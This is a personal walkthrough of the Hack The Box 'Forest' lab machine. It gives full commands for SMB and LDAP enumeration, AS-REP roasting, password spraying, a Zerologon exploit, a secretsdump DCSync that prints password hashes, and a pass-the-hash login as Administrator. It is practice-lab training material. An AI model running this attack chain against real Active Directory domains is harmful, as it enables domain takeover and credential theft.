Forest - Writeup - Konstantinovitz

## Summary **Platform:** hack the box **Time to root:** 2 hours **Difficulty Rating:** Easy Enumeration reveals [zerologon](https://github.com/dirkjanm/CVE-2020-1472) vulnerability which can be used to set the DC users password to empty string. After that a DSync attack may be performed using the recently changed DC user account and impackets secretsdump script to dump all the hashes. By using the Administrator hash it's possible to gain a WinRM connection to the remote host and then do whatever one would like... ## Anonymous ### SMB ```sh # initial enumeration nxc smb $RHOST -u '' -p '' --shares --rid-brute --loggedin-users # check common vulns nxc smb $RHOST -u '' -p '' -M ms17-010 -M zerologon -M printnightmare ``` ``` # todo nmap scan | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2025-02-05T08:35:37-08:00 ``` - null auth: not permitted - signing: True - SMBv1: True - guest auth: disabled - domain: `htb.local` - vulns: ?? - domain: ### LDAP - anonymous bind: permitted - can list users #### Dumping usernames ```sh ldapsearch -x -H ldap://$RHOST -b "DC=htb,DC=local" "(objectClass=user)" > ldap-users.out # piping usersnames into a separate file grep "sAMAccountName:" ldap-users.out | awk '{print $2}' > users.txt # checking descriptions for passwords grep "description:" ldap-users.out ``` ```sh cat ldap-users.out Guest DefaultAccount FOREST$ EXCH01$ $331000-VK4ADACQNUCA SM_2c8eef0a09b545acb SM_ca8c2ed5bdab4dc9b SM_75a538d3025e4db9a SM_681f53d4942840e18 SM_1b41c9286325456bb SM_9b69f1b9d2cc45549 SM_7c96b981967141ebb SM_c75ee099d0a64c91b SM_1ffab36a2f5f479cb HealthMailboxc3d7722 HealthMailboxfc9daad HealthMailboxc0a90c9 HealthMailbox670628e HealthMailbox968e74d HealthMailbox6ded678 HealthMailbox83d6781 HealthMailboxfd87238 HealthMailboxb01ac64 HealthMailbox7108a4e HealthMailbox0659cc1 sebastien lucinda andy mark santi john ``` #### ASREPROAST ```sh # errors nxc ldap $RHOST -u users.txt -p '' --asreproast asreproast.txt # don't seem to yield any love GetNPUsers.py htb.local/ -dc-ip $RHOST -usersfile users.txt -format hashcat > ASREPRoastHashes.txt ``` ### Password spray ```sh # username:username nxc smb $RHOST -u users.txt -p users.txt --continue-on-success # no love ``` ### SMB vulnerability - Zerologon Was out of ideas and thought the windows version was looking pretty grampy. So had a gander at finding some common vulnerabilities. ```sh nxc smb $RHOST -u '' -p '' -M ms17-010 -M zerologon -M printnightmare ``` ![[Pasted image 20250205182603.png]] Reveals that the target is vulnerable to [zerologon](https://github.com/dirkjanm/CVE-2020-1472). An example of execution may be found [here](https://medium.com/fmisec/zerologon-easy-way-to-take-over-active-directory-exploitation-c4b38c63a915). Running the exploit sets the password of the `FOREST

DC account to nil and nothing which can be verified by running: ```sh nxc smb $RHOST -u FOREST$ -p --shares ``` ![[Pasted image 20250205184111.png]] so far so good... Next up I'll dump the hashes from the DC using impackets ```sh secretsdump.py -no-pass -just-dc htb.local/forest\[email protected] ``` ```txt [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ... ``` next up I'll attempt to leverage the `Administrator` hash in a [[Pass The Hash Attack (PTH) - TODO]] attack. ```sh evil-winrm -i $RHOST -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 ``` yatzi... ## Lessons learned - never tried the zero logon attack before - didn't initially look for OS/SMB vulns - the official walk-through executes a differing attack vector, specifically [[AS-REP Roasting]] which I somehow, even though I attempted it multiple times, failed at. - compromised the box in about two hours, with time for coffee, breaks, girlfriend and taking a dump... - no hints and no chatgpt - i wanna start building obsidian templates which can be used for checklists for the different services etc.